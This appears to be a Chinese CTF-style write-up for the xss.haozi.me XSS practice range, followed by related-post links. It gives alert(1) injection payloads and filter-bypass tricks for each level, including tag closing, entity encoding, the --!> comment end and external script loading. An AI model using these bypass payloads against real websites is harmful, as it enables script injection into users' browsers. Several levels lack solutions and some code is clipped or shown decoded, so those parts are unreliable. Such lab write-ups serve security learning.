xss.haozi.me
一、0x00
<script>alert(1);</script>
二、0x01
想办法闭合<textarea>
</textarea><script>alert(1);</script>
三、0x02
闭合input
"><script>alert(1);</script>
四、0x03
server code显示将()括号转义为空,因此用反引号代替括号
<script>alert`1`;</script>
五、0x04
server code显示()和反引号均被转义,考虑用unicode编码转换()为
()
将其在标签内写入可实现转码,标签外不支持转码操作
<body onload="alert(1);">
六、0x05
写入的内容被注释掉,且-->被替换为表情包。需要将注释符闭合掉,--!>也可以作为注释结束。
--!><script>alert(1);</script>
七、0x06
/*****
/auto|on.*=|>/ig
i表示不区分大小写;
auto|on表示匹配auto或者on;
.表示匹配除换行符外的任意字符;
*表示匹配任意长度;
onmouseover 事件会在鼠标指针移动到指定的元素上时发生。
*****/
server code可以得到“auto”或“on”开头➕任意长度或字符➕“=”会被替换为“_”,
但“.”无法匹配换行符,因此可加入一个换行符打断施法。
八、0x07
/<\/?[^>]+>/gi
/****
\表示转义,将/转义为它本身;
?表示前面的字符可有可无;
[^>]代表除了>字符外全都匹配;
+代表前面一个字符可出现多次;
*****/
由于js语言结构兼容性高,不闭合也能实现功能,为避免转义,可选择性的将转义字符去掉不实现闭合。
九、0x08
/<\/style>/ig
转义</style>标签,多加一个空格绕过转义
</style >
<script>alert(1);</script>
十、0x09
/^https?:\/\/www\.segmentfault\.com/
/****
正则表达式中^表示必须以后面那个字符开头;
****/
转义的页面不是脚本,使用onerror
https://www.segmentfault.com" onerror="alert(1);
十一、0x0a
https://www.segmentfault.com
加一个@,将前边的部分作为身份认证信息而不是网址,后面真正的网址指向alert(1)
https://www.segmentfault.com@xss.haozi.me/j.js
十二、0x0b
/*** html语言不区分大小写,js语句区分大小写 ***/
server code将输入都转换为大写,因此可同上引入外部文件http://xss.haozi.me/j.js
<script src="https://xss.haozi.me/j.js"></script>
十三、0x0c
用body onload代替script,并标签内unicode编码
<body onload="alert(1);">
十四、0x0d
想办法注释
十五、0x0e
十六、0x0f
想办法闭合(标签内可进行unicode编码转换)
十七、0x10
不用管window.data是什么东西,直接闭合它绕过,然后输入
十八、0x11
/*****
ar a = document.createElement('a') //生成一个标签aocument.body.appendChild(a) //将上面生成的元素a添加到body标签内
****/
/****通过程序往标签内添加内容和直接往标签里写没有区别 ;
标签内会进行转义,因此不用管server code里面的字符转义
***/
先闭合原本的url后面的js语句,然后写入
十九、0x12
server code中第一个\是给第二个\进行转义的,因此要闭合console.log需要\\进行转义,代表输出一个\
xss.haozi.me相关推荐
- xss靶场、xss.haozi.me靶场详细通关教程
文章目录 前言 预备知识 HTML编码 img的可拓展 各种payload形式 0x00 0x01 0x02 0x03(使用了正则过滤圆括号) 其它解法 0x04(使用正则过滤圆括号和反引号) 0x0 ...
- xss.haozi.me通关教程
10.xss.haozi.me通关教程 0x00 首先整体浏览网站 分别是xss注入点,注入后的HTML代码以及网页源码 构造常规payload: <script>alert(1)< ...
- xss.haozi 思路总结 0x00-0x12
xss刷题网站2 https://xss.haozi.me/ 一个非常可爱的网站.这是网站界面,题目序号是十六进制,一共19道题. 0x00 直接输入<script>alert(1)< ...
- xss绕过字符过滤_XSS绕过实战练习
前言 写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下.有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战 ...
- XSS表情包靶场通关记录
平台 alert(1)https://xss.haozi.me 0X00 源码无防护,直接常规payload绕过 <script>alert(1)</script> <s ...
- switchyomega插件_CTF|你所关注的CTFer都在用的插件合集【附:XXE补给+CTF训练集】...
不看后悔系列,建议收藏 相信大家对 CTF 都不陌生了,今天为大家带来了一系列 CTF 必备 Chrome 插件. CTF 可能很多人想学 CTF,但又怕零基础学不懂.其实,CTF 并没有那么难. C ...
- 总结-各种安全漏洞学习环境集合(转)
在平时工作生活以及学习中,遇到了各种安全漏洞实验环境.本着方便自己方便他人的思想,我简单的将其收集一些.可能不全面,后续还会继续补充,希望能帮助初学安全的人,能为其提供一个好的动手环境. 1.uplo ...
- 全!CTF靶场、渗透实战靶场总结 (适合收藏)
CTF靶场.渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门.提升自己.丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯): 渗透实战靶场: ...
- 使用data伪协议绕过圆括号、反引号被过滤
文章目录 data协议常用数据格式 不使用编码的方式绕过圆括号过滤 data协议常用数据格式 不使用编码的方式绕过圆括号过滤 环境是https://xss.haozi.me/#/0x04 ,其中代码过 ...
- 记录个人web测试总结经验
快捷栏 漏洞 17年OWASP TOP10漏洞 常见的Web安全漏洞 Sql注入 注入类型 Sql原理: Sql注入产生的原理条件: XSS XSS分类:反射型.存储型.dom型 Xss原理: 三个类 ...
最新文章
- 006-spring cloud gateway-GatewayAutoConfiguration核心配置-GatewayProperties初始化加载、Route初始化加载...
- python退出程序-Python程序退出方式小结
- 网络上经典的DOS小命令
- oracle rac alter日志,ORACLE 11G RAC 增加日志组及增大日志文件
- Mysql更改表名大小写不敏感
- C++提高部分_C++函数模板的概念---C++语言工作笔记080
- 利用根轨迹法进行控制系统的分析和设计
- WinForm软件开机自动启动详细方法
- 423.从英文中重建数字
- 一句一句的读ArrayList源码(代码基于JDK11)
- 怎么搜索代码里的所有中文汉字
- 解决仙剑奇侠传“应用程序无法正常启动(0xc000000d)”的问题【转载】
- matlab求解零输入响应,matlab求解零状态零输入响应
- Jenkins+GitLab+Docker持续集成LNMP
- Android多窗口模式(分屏模式)
- 机器学习|切比雪夫、辛钦和贝努里大数定律|15mins入门|概统学习笔记(十四)
- 不要一个人吃饭---人脉就是钱脉
- GPT分区相关的操作
- DSP RS232 RS485通信
- python考证书-Python全国二级等级考试(2019)
热门文章
- 【转帖】刘备三顾茅庐,请Elasticsearch出山
- c++智能指针转化:static_pointer_cast、dynamic_pointer_cast、const_pointer_cast、reinterpret_pointer_cast
- R语言绘制bivariate polar plots
- 基于ARM的嵌入式SMTP远程控制设计
- CSS3制作圆角图片和椭圆形图片
- 四叶草关闭啰嗦模式_真正的高性能车!Giulia 四叶草评测
- NYOJ 1132 promise me a medal (判断两线段是否相交)
- 1916 Problem C	合唱队形
- linux的input命令,通过xinput命令在Manjaro中启用Tap-to-click功能的方法
- 古城钟楼微博地支报时程序铛,100行代码实现